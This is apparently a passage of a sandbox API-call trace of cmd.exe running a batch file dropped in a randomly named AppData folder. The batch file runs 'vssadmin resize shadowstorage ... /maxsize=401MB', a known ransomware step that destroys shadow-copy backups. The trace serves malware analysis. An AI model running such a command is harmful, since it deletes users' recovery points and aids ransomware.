dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0032.294] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0032.294] _get_osfhandle (_FileHandle=3) returned 0x78 [0032.294] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.295] _get_osfhandle (_FileHandle=3) returned 0x78 [0032.295] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.295] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x18c1, lpOverlapped=0x0) returned 1 [0032.295] SetFilePointer (in: hFile=0x78, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0032.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=11, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0032.295] _get_osfhandle (_FileHandle=3) returned 0x78 [0032.295] GetFileType (hFile=0x78) returned 0x1 [0032.295] _get_osfhandle (_FileHandle=3) returned 0x78 [0032.295] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0032.295] GetProcessHeap () returned 0x3e0000 [0032.295] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f8270 [0032.295] GetProcessHeap () returned 0x3e0000 [0032.295] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8270 | out: hHeap=0x3e0000) returned 1 [0032.295] GetProcessHeap () returned 0x3e0000 [0032.295] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f6cf0 [0032.296] _wcsicmp (_String1="echo", _String2=")") returned 60 [0032.296] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0032.296] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0032.296] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0032.296] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0032.296] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0032.296] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0032.296] GetProcessHeap () returned 0x3e0000 [0032.296] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f6d50 [0032.296] GetProcessHeap () returned 0x3e0000 [0032.296] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3e0eb0 [0032.296] GetProcessHeap () returned 0x3e0000 [0032.296] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3ef4b0 [0032.297] _tell (_FileHandle=3) returned 11 [0032.297] _close (_FileHandle=3) returned 0 [0032.297] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0032.297] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0032.297] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0032.297] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0032.297] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0032.297] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0032.297] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0032.297] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0032.297] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0032.298] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0032.298] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.298] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1c) returned 0x3f6158 [0032.298] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6158, Size=0x12) returned 0x3e1290 [0032.298] GetProcessHeap () returned 0x3e0000 [0032.298] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3e1290) returned 0x12 [0032.298] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1c) returned 0x3f6158 [0032.298] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0032.298] _get_osfhandle (_FileHandle=1) returned 0x264 [0032.298] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0032.298] _get_osfhandle (_FileHandle=1) returned 0x264 [0032.298] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0032.298] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0032.298] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0032.299] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0032.299] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0032.299] SetConsoleInputExeNameW () returned 0x1 [0032.299] GetConsoleOutputCP () returned 0x1b5 [0032.299] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0032.299] SetThreadUILanguage (LangId=0x0) returned 0x409 [0032.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0032.299] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0032.300] _get_osfhandle (_FileHandle=3) returned 0x78 [0032.300] SetFilePointer (in: hFile=0x78, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0032.300] GetProcessHeap () returned 0x3e0000 [0032.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0032.300] GetProcessHeap () returned 0x3e0000 [0032.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0032.300] GetProcessHeap () returned 0x3e0000 [0032.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0032.300] GetProcessHeap () returned 0x3e0000 [0032.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e0eb0 | out: hHeap=0x3e0000) returned 1 [0032.300] GetProcessHeap () returned 0x3e0000 [0032.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d50 | out: hHeap=0x3e0000) returned 1 [0032.300] GetProcessHeap () returned 0x3e0000 [0032.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0032.300] _get_osfhandle (_FileHandle=3) returned 0x78 [0032.300] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0032.300] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x18b6, lpOverlapped=0x0) returned 1 [0032.300] SetFilePointer (in: hFile=0x78, lDistanceToMove=72, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0032.300] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=61, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\r\n") returned 61 [0032.300] _get_osfhandle (_FileHandle=3) returned 0x78 [0032.300] GetFileType (hFile=0x78) returned 0x1 [0032.300] _get_osfhandle (_FileHandle=3) returned 0x78 [0032.300] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0032.300] GetProcessHeap () returned 0x3e0000 [0032.300] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f8270 [0032.300] GetProcessHeap () returned 0x3e0000 [0032.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8270 | out: hHeap=0x3e0000) returned 1 [0032.301] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f6cf0 [0032.301] GetProcessHeap () returned 0x3e0000 [0032.301] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0032.301] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x70) returned 0x3f6d50 [0032.302] _tell (_FileHandle=3) returned 72 [0032.302] _close (_FileHandle=3) returned 0 [0032.302] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0032.302] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0032.302] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0032.302] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0032.302] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0032.302] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0032.302] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0032.302] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0032.302] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0032.302] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0032.302] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0032.302] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0032.302] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0032.302] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0032.302] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0032.303] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0032.303] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0032.303] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0032.303] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0032.303] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0032.303] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0032.303] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0032.303] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0032.303] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0032.303] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0032.303] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0032.303] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0032.303] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0032.303] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0032.303] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0032.303] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0032.303] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0032.303] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0032.303] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0032.303] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0032.303] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0032.303] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0032.303] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0032.303] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0032.303] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0032.303] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0032.303] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0032.303] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6dc8 [0032.304] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6dd0, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0032.304] SetErrorMode (uMode=0x0) returned 0x1 [0032.304] GetProcessHeap () returned 0x3e0000 [0032.304] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6dc8, Size=0x66) returned 0x3f6dc8 [0032.304] GetProcessHeap () returned 0x3e0000 [0032.304] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6dc8) returned 0x66 [0032.304] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.304] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0032.304] GetProcessHeap () returned 0x3e0000 [0032.304] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6e38 [0032.304] GetProcessHeap () returned 0x3e0000 [0032.304] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6f60 [0032.304] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6f60, Size=0x122) returned 0x3f6f60 [0032.304] GetProcessHeap () returned 0x3e0000 [0032.304] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6f60) returned 0x122 [0032.304] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.304] GetProcessHeap () returned 0x3e0000 [0032.304] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7090 [0032.304] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7090, Size=0x76) returned 0x3f7090 [0032.304] GetProcessHeap () returned 0x3e0000 [0032.304] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7090) returned 0x76 [0032.304] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.304] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0032.304] GetLastError () returned 0x2 [0032.304] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0032.305] GetLastError () returned 0x2 [0032.305] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.305] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7110 [0032.305] FindClose (in: hFindFile=0x3f7110 | out: hFindFile=0x3f7110) returned 1 [0032.305] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0032.305] GetLastError () returned 0x2 [0032.305] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7110 [0032.305] FindClose (in: hFindFile=0x3f7110 | out: hFindFile=0x3f7110) returned 1 [0032.305] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0032.305] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0032.305] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.305] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7110 [0032.306] GetProcessHeap () returned 0x3e0000 [0032.306] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x82) returned 0x3f7328 [0032.306] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f8270 [0032.306] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f8278, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0032.306] SetErrorMode (uMode=0x0) returned 0x1 [0032.306] GetProcessHeap () returned 0x3e0000 [0032.306] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f8270, Size=0x66) returned 0x3f8270 [0032.306] GetProcessHeap () returned 0x3e0000 [0032.306] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f8270) returned 0x66 [0032.306] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.306] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0032.306] GetProcessHeap () returned 0x3e0000 [0032.306] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f73b8 [0032.306] GetProcessHeap () returned 0x3e0000 [0032.306] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f74e0 [0032.306] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f74e0, Size=0x122) returned 0x3f74e0 [0032.306] GetProcessHeap () returned 0x3e0000 [0032.306] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f74e0) returned 0x122 [0032.306] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.306] GetProcessHeap () returned 0x3e0000 [0032.306] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7610 [0032.306] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7610, Size=0x76) returned 0x3f7610 [0032.306] GetProcessHeap () returned 0x3e0000 [0032.306] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7610) returned 0x76 [0032.306] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.306] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0032.306] GetLastError () returned 0x2 [0032.307] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0032.307] GetLastError () returned 0x2 [0032.307] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7690 [0032.307] FindClose (in: hFindFile=0x3f7690 | out: hFindFile=0x3f7690) returned 1 [0032.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0032.307] GetLastError () returned 0x2 [0032.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7690 [0032.307] FindClose (in: hFindFile=0x3f7690 | out: hFindFile=0x3f7690) returned 1 [0032.307] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0032.307] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0032.307] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.307] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0032.308] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0032.308] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0032.308] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3e0eb0 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.308] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.309] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.309] GetProcessHeap () returned 0x3e0000 [0032.309] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e0eb0 | out: hHeap=0x3e0000) returned 1 [0032.309] GetProcessHeap () returned 0x3e0000 [0032.309] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0032.309] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0032.311] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x91c, dwThreadId=0x920)) returned 1 [0032.320] CloseHandle (hObject=0x78) returned 1 [0032.320] SetEnvironmentVariableW (lpName="COPYCMD", 